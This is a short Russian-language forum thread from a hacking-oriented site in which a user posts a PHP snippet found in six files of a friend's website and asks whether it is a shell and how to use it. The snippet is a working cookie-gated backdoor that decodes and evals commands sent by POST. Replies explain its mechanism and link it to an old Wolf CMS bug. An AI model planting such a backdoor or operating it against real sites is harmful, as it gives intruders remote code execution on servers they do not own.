1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Обнаружел вредный код на Сайте

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем bake01, 24 июл 2014.

  1. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    Нашел в сайте друга этот код.... в 6 файлах было shell? и как им пользоваться? открывал на прямую ничего


    Код:
    <?php
    if (isset($_COOKIE['adm'])) {
        if (isset($_POST['crc'], $_POST['cmd'])) {
            if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
                eval(gzuncompress(base64_decode($_POST['cmd'])));
            } else
                echo 'repeat_cmd';
        }
    }
    ?>
     
    Метки:
  2. EEjester

    EEjester hack_the_god

    Регистрация:
    25 окт 2012
    Сообщения:
    1.326
    Симпатии:
    941
    и в каком месте он вредоносный?
     
  3. TopicStarter Overlay
    bake01

    bake01

    Регистрация:
    20 ноя 2013
    Сообщения:
    212
    Симпатии:
    62
    ХЗ. в яндекс вбил почти везде говорили о shell. даже антивирус хостинга запишал...
     
  4. NANOTECH

    NANOTECH

    Регистрация:
    11 дек 2012
    Сообщения:
    150
    Симпатии:
    69
    код расшифровывает и выполняет то что передается в 'cmd'.
    если это обработчик формы и не ограничена длина поля и нет другой защиты, то введя в поле формы кодец можно много что сделать)
     
  5. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.681
    Симпатии:
    2.274
    Старый баг под Wolf CMS 0.7.5
    Please login or register to view links
     

Поделиться этой страницей

Загрузка...